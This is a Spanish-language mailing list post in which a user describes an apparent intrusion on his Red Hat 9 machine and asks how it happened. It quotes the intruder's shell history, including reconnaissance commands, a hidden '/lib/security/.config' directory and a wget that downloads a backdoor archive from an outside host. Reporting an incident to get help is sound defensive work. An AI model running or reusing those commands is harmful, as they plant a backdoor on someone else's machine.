Hola lista, un saludo para todos. S� que esto es una lista de debian pero quisiera tambi�n ayuda de uds. Les cuento.
Creo que fui victima de un ataque y quisiera saber como lo hiceron para proteger mi maquina aun m�s, adem�s el ataque fue como de advertencia porque ya me habria destruido todo. Y creo que me capturaron un password y montaron un shell paralelo, esa es mi apreciacion y uds me diran si es asi. Estaba trabajando en mi maquina(con redhat9) y de repente vi algo raro en los archivo que estan en /etc. entonce me fui a /var/log/messages y no encontre nada raro, excepto que me parecio raro que no tenia registrado nada de fecha 18 de febrero en el syslog. Luego hice un history y me aparecio esto que por su puesto yo no lo hice(m�s raro aun): 484 cat /etc/issue 485 ps 486 bash 487 /usr/sbin:/sbin:/usr/bin:/bin:/lib/security/.config/bin 488 netstat -a 489 cd /lib/security/.config/bin 490 cd /lib/security/.config 491 dir 492 cd ssh 493 dir 494 cd .. 495 wget http://www.gwydiondylan.org/downloads/binaries/linux/x86 496 /tar/gwydion-dylan-2.3.10-x86-linux.tar.gz 497 wget http://www.gwydiondylan.org/downloads/binaries/linux/x86/tar/gwydion-dylan-2.3.10-x86-linux.tar.gz 498 wget geocities.com/s3rjiu/backdoor/ser.tar.gz Esto paquete porsuesto no los baje. Ah hago un ps y no sale nada, me dice esto: Violaci�n de segmento Cual es la inseguridad que tengo? Gracias y saludos...... -- Federico Contreras T.S.U. en Inform�tica U.D.O.
